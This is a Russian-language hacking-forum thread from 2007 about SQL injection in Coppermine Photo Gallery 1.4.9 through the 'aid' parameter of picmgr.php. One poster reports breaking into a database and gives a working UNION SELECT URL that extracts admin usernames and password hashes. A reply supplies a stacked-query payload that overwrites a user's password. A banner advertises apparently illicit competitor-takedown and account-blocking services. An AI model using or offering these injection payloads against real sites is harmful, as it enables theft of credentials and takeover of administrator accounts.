Форум АНТИЧАТ - Coppermine Photo Gallery 1.4.9

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Coppermine Photo Gallery 1.4.9

Опции темы

Поиск в этой теме

Опции просмотра

Coppermine Photo Gallery 1.4.9

28.07.2007, 20:40

AllaryS

Новичок

Регистрация: 31.01.2006

Сообщений: 4

Провел на форуме:
7208

Репутация: 0

Coppermine Photo Gallery 1.4.9

Пробился к базе могу селектить, вопрос можно ли выполнить INSERT или UPDATE

P.S. Да сам пробовал никак не получаеццо 8(
P.P.S Пользовалсо уязвимостью скрипта picmgr.php переменной aid

Код:

http://host/gallery/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--

28.07.2007, 21:29

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

зависит от того есть ли мэджик квоутс и есть ли права у юзера для апйдета-инзерта
а вообще вид запроса такой

Код:

select * from sometable 
where ='x';
      UPDATE user
      SET pass = '31337'
      WHERE email = 'admin@microsoft.ru';

то есть ./picmgr.php?aid=31337';UPDATE+user+SET+pass='31337' +WHERE+email='admin@microsoft.ru';

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Coppermine Photo Gallery vX.X.X<=1.4.10	fly	Уязвимости	2	21.04.2007 18:21
инекция в Coppermine Photo Gallery 1.4.8	ufo44	Уязвимости	1	22.11.2006 11:36

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход